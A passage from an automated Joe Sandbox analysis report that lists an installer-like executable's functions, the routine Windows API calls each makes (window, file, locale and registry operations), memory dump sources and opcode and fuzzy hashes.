                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                  • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                                                                                                                                  • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004085DC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                                                                                                                                                                    • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                                                                                                                                                                    • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1658689577-0
                                                                                                                                                                                                                                  • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                                                                                                                                                  • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041FB9C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoScroll
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 629608716-0
                                                                                                                                                                                                                                  • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                                                                                                                                                  • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046C450 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                                                                                                                                    • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                                                                                                                                  • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                                                                                                                                                                    • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                                                                                                                                                                    • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3319771486-0
                                                                                                                                                                                                                                  • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                                                                                                                                                  • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00441394 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                                                                                                                                  • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416550 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                                                                                                  • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                                                                                                                                                  • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004149B4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                                                                  • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                                                                                                                                  • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004507C4 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                                                                                                                                                  • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042CCCC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: 0e0352666fd17ab1d356d9ba125a744cb1154344636c6ff56eb70bc4ed3e9319
                                                                                                                                                                                                                                  • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e0352666fd17ab1d356d9ba125a744cb1154344636c6ff56eb70bc4ed3e9319
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042E8C8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FormatMessage
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1306739567-0
                                                                                                                                                                                                                                  • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                                                                                                                                  • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004062E8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                                                                                                  • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                                                                                                                  • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042DDE4 Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                  • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                                                                                                                                  • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00454BF8 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                                                                                  • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                                                                                                                                  • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041467C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
